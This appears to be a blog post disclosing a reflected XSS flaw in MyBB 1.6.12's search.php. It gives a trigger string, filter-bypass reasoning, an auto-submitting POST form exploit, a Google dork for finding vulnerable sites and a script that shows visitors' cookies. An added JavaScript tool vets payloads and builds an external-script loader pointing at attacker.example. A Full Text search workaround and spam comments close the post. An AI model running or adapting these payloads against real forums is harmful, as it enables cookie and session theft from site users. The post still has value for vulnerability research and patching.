MyBB 1.6.12 POST XSS 0day

This is an odd bug I found in MyBB while fuzzing the input of search.php. This was the input I gave:

alert (bar) () ; // ' " > < prompt \x41 %42 constructor onload

MyBB throws out a SQL error:

SELECT t.tid, t.firstpost
FROM mybb_threads t
WHERE 1=1 AND t.closed NOT LIKE 'moved|%'
AND (  LOWER(t.subject) LIKE '%&lt;foo&gt; &lt;h1&gt; &lt;script&gt; alert (bar) () ; //%'  LOWER(t.subject)
LIKE '%&gt; &lt; prompt \x41 \%42 constructor onload%')


That made me analyze the behaviour and work back to the cause. After narrowing the input down, this is the minimal string that triggers the error.

This part must stay constant: or'("\

To reproduce the issue, put any single character directly in front of or'("\ and any two characters directly after it, with no spaces in between them.

This will be the skeleton:

[1 char value]or'("\[2 char values]

The two trailing characters may include a space, for example:

qor'("\ a

SELECT t.tid, t.firstpost
FROM mybb_threads t
AND t.closed NOT LIKE 'moved|%'  AND (  LOWER(t.subject)
LIKE '%qor (%'  LOWER(t.subject) LIKE '%\2a%')


How to Inject JavaScript and HTML?

We can inject HTML and JavaScript, but search.php filters out the characters ' " [ ] - . The method is to keep the constant in place and put the payload either before or after it. If we put the payload in front of the constant, it ends up in the query like this:

<Payload here>qor'("\2a

SELECT t.tid, t.firstpost
FROM mybb_threads t
WHERE 1=1 AND t.closed NOT LIKE 'moved|%'  
AND (  LOWER(t.subject) LIKE '%qor (%'  LOWER(t.subject) LIKE '%\2a%')

For example, injecting an HTML heading in front of the constant looks like this in the page source:

SELECT t.tid, t.firstpost
FROM mybb_threads t
WHERE 1=1 AND t.closed NOT LIKE 'moved|%'  
AND (  LOWER(t.subject) LIKE '%<h1>Osanda</h1>>qor (%'  LOWER(t.subject) LIKE '%\2a%')


If instead we place the payload after the constant, it is reflected in two places in the page source.


The first is the SQL error message itself:

1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 
'LOWER(t.subject) LIKE '%\2a%')' at line 3

The second is inside the echoed query:

SELECT t.tid, t.firstpost
FROM mybb_threads t
WHERE 1=1        
AND t.closed NOT LIKE 'moved|%'  
AND (  LOWER(t.subject) LIKE '%qor (%'  LOWER(t.subject) LIKE '%\2a%')



An example of the injected JavaScript being interpreted is alert(/Osanda/). Notice that our string is converted to lower case on its way into the query, so a payload that depends on case-sensitive JavaScript identifiers will not work as written.


Remember that the filter drops the ' " [ ] - characters, so quotes are not available inside the payload. An external script source gets around this: unquoted attribute values are valid HTML, so <script src=//host/file.js></script> needs no quotes at all, and the loaded file can contain anything for further client-side attacks.
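The following JavaScript is an added example, not code from the original post or from MyBB. It models the two transformations the write-up reports for the keywords field (lower-casing, and stripping ' " [ ] -) so a payload can be vetted offline before it is sent, and builds the quote-free external-script loader and the POST body for search.php. The filter model, the hostname attacker.example and all function names are assumptions.

```javascript
// Added example (not from the original post, not MyBB's code): a model of
// the two transformations the write-up describes for search.php keywords.
// Assumptions taken from the post: the string is lower-cased, and the
// characters ' " [ ] - are removed.

const FILTERED = new Set(["'", '"', '[', ']', '-']);

// Trigger constant with the 1-char prefix and 2-char suffix used in the
// post's PoC: qor'("\2a
const TRIGGER = "qor'(\"\\2a";

// Apply the sink's transformations to a string.
function emulateSink(s) {
  let out = '';
  for (const ch of s.toLowerCase()) {
    if (!FILTERED.has(ch)) out += ch;
  }
  return out;
}

// True when the payload reaches the error page byte-for-byte intact.
function survives(payload) {
  return emulateSink(payload) === payload;
}

// Quote-free loader for an external script. Unquoted attribute values are
// valid HTML; host and path are forced to lower case so the lower-casing
// step cannot change them (so the file on the attacker host must have a
// lower-case path too). A hostname containing '-' would be mangled by the
// filter, so the function refuses it.
function externalLoader(host, path) {
  const tag = `<script src=//${host.toLowerCase()}/${path.toLowerCase()}></script>`;
  if (!survives(tag)) throw new Error('loader contains filtered characters');
  return tag;
}

// Assemble the keywords value with the payload before or after the trigger.
function buildKeywords(payload, position = 'after') {
  return position === 'before' ? payload + TRIGGER : TRIGGER + payload;
}

// application/x-www-form-urlencoded body for the search.php POST.
function postBody(payload, position = 'after') {
  return new URLSearchParams({
    action: 'do_search',
    keywords: buildKeywords(payload, position),
  }).toString();
}

// Vet a list of candidate payloads; returns [payload, survives, afterSink].
function vet(payloads) {
  return payloads.map((p) => [p, survives(p), emulateSink(p)]);
}

if (typeof require !== 'undefined' && require.main === module) {
  for (const [p, ok, seen] of vet([
    '<script>alert(/xss/)</script>',                   // no quotes, lower case
    '<script>alert("xss")</script>',                   // quotes are stripped
    '<script>alert(String.fromCharCode(88))</script>', // case is lost
    externalLoader('attacker.example', 'poc.js'),
  ])) {
    console.log(ok ? 'ok   ' : 'FAIL ', p, '->', seen);
  }
  console.log(postBody('<script>alert(/xss/)</script>'));
}
```

Only the first and last candidates survive: the quoted alert loses its quotes, and String.fromCharCode is lower-cased into an undefined name, which is why the post moves the real payload into an external file.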

Proof of Concept

Exploit-Title: MyBB 1.6.12 POST XSS 0day
Google-Dork: inurl:index.php intext:Powered By MyBB
Date: February 2nd of 2014
Bug Discovered and Exploit Author: Osanda Malith Jayathissa
E-Mail: osandajayathissa[at]
Vendor Homepage:
Software Link:
Version: 1.6.12 (older versions might be vulnerable)
Tested on: Windows 8 64-bit
Original write-up:
CVE: CVE-2014-1840

    <!-- Auto-submitting POST form: the keywords value is the trigger constant followed by the payload -->
    <form name="exploit" action="http://localhost/mybb_1612/Upload/search.php" method="POST">
      <input type="hidden" name="action" value="do_search" />
      <input type="hidden" name="keywords" value="qor&apos;(&quot;\2a&lt;script&gt;alert(/XSS/)&lt;/script&gt; " />
    </form>
    <script>document.exploit.submit();</script>

POC Video

Since quotes are filtered, the creative part goes into an external script: from there you can read the domain, cookies and anything else beyond the filters. Reference the source with a quote-free <script src=...> tag and keep the real payload in the file.


The poc file contains:

// Runs in the victim's origin: writes the domain and cookies into the page to prove script execution beyond the filters
document.write('<h1>MyBB XSS 0day</h1><br/><h2>Domain: ' + document.domain + '</h2><br/>' +
    '<h3> Osanda and HR</h3><strong>User Cookies: </strong><br/>' + document.cookie);
alert('XSS by Osanda & HR');

external XSS

Thanks to Hood3dRob1n for this idea 🙂

I have no idea how to inject SQL through this bug. You may give it a try and see.



To protect against this you can disable "Standard" searching and enable the "Full Text" option in the Admin CP. This is a workaround that avoids the affected query builder rather than a fix for the error page echoing the failed query, so it should be combined with updating MyBB when a fixed release is available.
Steps to do this:

  • Log in to the Admin CP
  • Click Configuration -> Search Settings
  • Choose "Full Text" as the Search type and click Save Settings

Thanks to Cake for reminding me of this.




20 thoughts on “MyBB 1.6.12 POST XSS 0day”

  1. Pretty nice post. I just stumbled upon your weblog and wished to say that I have truly enjoyed browsing your
    blog posts. After all I will be subscribing to your rss
    feed and I hope you write again very soon!

  2. Exceptional post however I was wondering if you could write a little more on this topic?

    I’d be very grateful if you could elaborate a little bit further.

  3. Hi, I do think this is an excellent site. I stumbled upon it 😉 I’m going to revisit once
    again since I have book-marked it. Money and freedom is the best way to change, may you be rich and continue to help others.

  4. @Osanda
    Did you attempt Responsible Disclosure first? Why Full Disclosure?
